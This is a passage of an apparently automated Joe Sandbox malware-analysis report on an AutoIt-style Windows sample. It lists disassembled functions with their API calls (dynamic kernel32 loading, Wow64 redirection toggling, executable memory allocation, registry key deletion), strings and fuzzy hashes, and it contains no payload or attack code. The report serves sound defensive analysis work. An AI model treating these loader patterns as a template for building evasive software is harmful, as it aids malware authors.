                                          • Opcode Fuzzy Hash: a5a136bdf0f0af23359bd6901b892044ec16c5f492da8c4304bc130218f16db0
                                          • Instruction Fuzzy Hash: C8915C706007119FDB28DF24D885A6ABBF8FF48714F14956EF94AEB291DB71E840CB60
                                          Function 00DF524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                          Download Yara Rule
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00DF52DD
                                            • Part of subcall function 00E00340: __87except.LIBCMT ref: 00E0037B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__87except__start
                                          • String ID: pow
                                          • API String ID: 2905807303-2276729525
                                          • Opcode ID: e5b3285af888b39b812ff3b3aef4cdde9db6e0f8edd2a7a3d7172dc7789edd12
                                          • Instruction ID: 1b7b9c95d5602215881ce9e676cdda683afc015f92232dcd63b2b1e44581fd7e
                                          • Opcode Fuzzy Hash: e5b3285af888b39b812ff3b3aef4cdde9db6e0f8edd2a7a3d7172dc7789edd12
                                          • Instruction Fuzzy Hash: A651AF21E0CA098BC7117718E90137E6BD0DB00354F29DE59E7E5621EDEF74CCD89A5A
                                          Function 00DF023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$+
                                          • API String ID: 0-2552117581
                                          • Opcode ID: 2e98f77f3ac4f3610e7275af527ea04e98f1a43811966e16686f6c05da6f2fdf
                                          • Instruction ID: bc52593720654e24a68a40279411c1abaf631bce0c77969197011d6fc78a9e01
                                          • Opcode Fuzzy Hash: 2e98f77f3ac4f3610e7275af527ea04e98f1a43811966e16686f6c05da6f2fdf
                                          • Instruction Fuzzy Hash: D651567610466ACFDF15DF28D4886FE7BA4EF15310F188056EC91AB2A1D7309D82C770
                                          Function 00E57648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E576D0
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E576E4
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E57708
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: bf46cf5c6d746b5f3f8ba830ae7f6b210f548b50145f9e0026cbd3e07da99ccb
                                          • Instruction ID: 715c6f68975221106adf8cb1fe4d4d86f152775bc716d82951cc5e4b2f3c749f
                                          • Opcode Fuzzy Hash: bf46cf5c6d746b5f3f8ba830ae7f6b210f548b50145f9e0026cbd3e07da99ccb
                                          • Instruction Fuzzy Hash: D721F132500218BFDF15CFA4DC42FEA3BA9EF48724F101615FE557B1D0D6B1A8648BA0
                                          Function 00E56F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E56FAA
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E56FBA
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E56FDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: cd98091f650d8793b0b943054f01df7db811b6e84692d297b7253f292f4089e0
                                          • Instruction ID: 381297362f98a27cc8db82f4e1f3d81b26923f23966b903c986064dfc62396bc
                                          • Opcode Fuzzy Hash: cd98091f650d8793b0b943054f01df7db811b6e84692d297b7253f292f4089e0
                                          • Instruction Fuzzy Hash: 0521F232B10218BFDF118F54DC84EAB3BAAEF89765F419525F904AB1A0C671AC158BA0
                                          Function 00E5797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E579E1
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E579F6
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E57A03
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: 8ebefc7ef290af1159c8e3bd226ada6a8b6eb849cf1185b1e06175395af1a059
                                          • Instruction ID: ee9e25a012bfc6e28b9428a8e5509f5cf099b0319a9edc9949f2b117d24a6e52
                                          • Opcode Fuzzy Hash: 8ebefc7ef290af1159c8e3bd226ada6a8b6eb849cf1185b1e06175395af1a059
                                          • Instruction Fuzzy Hash: C611C432244208BAEF149E61DC05FDB37A9EF89769F021919FA45B6091D2719815CB60
                                          Function 00E4C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00E11D88,?), ref: 00E4C312
                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E4C324
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                          • API String ID: 2574300362-1816364905
                                          • Opcode ID: 9f7961137897519d38be073f0b32c3cea47baef2a1bd6f299b8842970b607928
                                          • Instruction ID: 971b38448b39b8e5a2481c436149316656e5beedc614f12726ac950a119fe84a
                                          • Opcode Fuzzy Hash: 9f7961137897519d38be073f0b32c3cea47baef2a1bd6f299b8842970b607928
                                          • Instruction Fuzzy Hash: C6E0C270202703CFCB605F26E804A4676D4EF0870AF90E879E889F32A0E770E880CB60
                                          Function 00DD4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DD4C2E), ref: 00DD4CA3
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DD4CB5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: 31c50f367076f06b5b63d8e9cbc74434ab2a4eb442ac0c008e03f9a46cf4a3f2
                                          • Instruction ID: 88653f86a3813bab55d001b1b3bd747050372d4ef09a49f602266c241df44bd5
                                          • Opcode Fuzzy Hash: 31c50f367076f06b5b63d8e9cbc74434ab2a4eb442ac0c008e03f9a46cf4a3f2
                                          • Instruction Fuzzy Hash: 5BD01730521B23CFD7209F36DA18A0676E9AF05792B158C3AD886E6250EA70E884CA61
                                          Function 00DD4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DD4CE1,?), ref: 00DD4DA2
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DD4DB4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-1355242751
                                          • Opcode ID: 96b3ff49d973a59ae8648f712868fac96fd3a2ad3b2bd49c6eb27e12ddd46afa
                                          • Instruction ID: 01bcc600034df9389733ab9a037ca1a9f1422ef23915108600d8d06e641ae3d9
                                          • Opcode Fuzzy Hash: 96b3ff49d973a59ae8648f712868fac96fd3a2ad3b2bd49c6eb27e12ddd46afa
                                          • Instruction Fuzzy Hash: 19D05E31550B13CFD720AF32D908A4676E5AF05366F25CC3ED8DAE6250EB70E884CB60
                                          Function 00DD4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DD4D2E,?,00DD4F4F,?,00E962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DD4D6F
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DD4D81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-3689287502
                                          • Opcode ID: 578e54a3907dc19acee9a2508feba83dc6c5205997db2db2a5d366e9585c57f1
                                          • Instruction ID: 6e0202cb8f8e6dd3958c196112ed035933273014ff227467eb9b2307c5c4943c
                                          • Opcode Fuzzy Hash: 578e54a3907dc19acee9a2508feba83dc6c5205997db2db2a5d366e9585c57f1
                                          • Instruction Fuzzy Hash: C2D01730510B13CFD720AF32D90861676E9AF15352B298C3AD8DAE6250E670D884CA60
                                          Function 00E51072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00E512C1), ref: 00E51080
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E51092
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: ac53d157ec2a83868bf48e9989ceaa866e42992e8c1a411c05b86d0aefe52852
                                          • Instruction ID: 144bcba96d38a08bd5561643bcfe5200d29edcd559114270e9a134caefc92c7c
                                          • Opcode Fuzzy Hash: ac53d157ec2a83868bf48e9989ceaa866e42992e8c1a411c05b86d0aefe52852
                                          • Instruction Fuzzy Hash: ECD01230510712CFD7206F35D95861676E4AF05396B119C79E8CDF71A1D770C4C4C750
                                          Function 00E493F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E49009,?,00E5F910), ref: 00E49403
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E49415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetModuleHandleExW$kernel32.dll
                                          • API String ID: 2574300362-199464113
                                          • Opcode ID: 2810c1fa84008d4ef0653979dadaf8aef625a645fc16e9102b611d1569a76b21
                                          • Instruction ID: 3fff9ff9c7a79132d8c9552d32aac6f9edf91fe9d903311c3c23af9656f6ab33
                                          • Opcode Fuzzy Hash: 2810c1fa84008d4ef0653979dadaf8aef625a645fc16e9102b611d1569a76b21
                                          • Instruction Fuzzy Hash: BFD0C730500B13CFD720AF32EA4D603B2E4AF00342B00DC3AE8AAF2552EA70D884CB50
                                          Function 00E276C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3b4af637ee9d5e61c7b7383df1afcc764cbe9eed584185d48b6ca45882cfe8a9
                                          • Instruction ID: ac0cbbded1bd6db7855e544daddee1a79a65486cf2e78035e8adf54b6f3aec8c
                                          • Opcode Fuzzy Hash: 3b4af637ee9d5e61c7b7383df1afcc764cbe9eed584185d48b6ca45882cfe8a9
                                          • Instruction Fuzzy Hash: 0CC18074A04226EFCB18CF94D884EAEB7F5FF88714B119599E885EB251D730ED81CB90
                                          Function 00E4E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 00E4E3D2
                                          • CharLowerBuffW.USER32(?,?), ref: 00E4E415
                                            • Part of subcall function 00E4DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E4DAD9
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E4E615
                                          • _memmove.LIBCMT ref: 00E4E628
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          • Opcode ID: 17d0247f48f477c9fdb65732ded3247b0eef672070f83011f2eecb89c861010e
                                          • Instruction ID: da19311009e1ebfd6d4b5230ee5f0d149af87970afadcbfed90dee009ddda3c4
                                          • Opcode Fuzzy Hash: 17d0247f48f477c9fdb65732ded3247b0eef672070f83011f2eecb89c861010e
                                          • Instruction Fuzzy Hash: EDC17B71A083119FC714DF28D480A6ABBE4FF88318F14996EF899AB351D731E945CF92
                                          Function 00E483A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 00E483D8
                                          • CoUninitialize.COMBASE ref: 00E483E3
                                            • Part of subcall function 00E2DA5D: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00E2DAC5
                                          • VariantInit.OLEAUT32(?), ref: 00E483EE
                                          • VariantClear.OLEAUT32(?), ref: 00E486BF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: 200b1b4340050082147bfba26c318de6645cfa695ea54a9d67c00dd1ac8951c1
                                          • Instruction ID: 9bc9af75a6c75862b5785f8297394a4eae0ad2f19b4a495c7bbcfb50a90d457a
                                          • Opcode Fuzzy Hash: 200b1b4340050082147bfba26c318de6645cfa695ea54a9d67c00dd1ac8951c1
                                          • Instruction Fuzzy Hash: 50A12775204711AFCB10DF24D991A2EB7E4FF88314F056559F99AAB3A2CB31ED04CB62
                                          Function 00E27A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                          Download Yara Rule
                                          APIs
                                          • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00E27C32
                                          • CoTaskMemFree.COMBASE(00000000), ref: 00E27C4A
                                          • CLSIDFromProgID.COMBASE(?,?), ref: 00E27C6F
                                          • _memcmp.LIBCMT ref: 00E27C90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
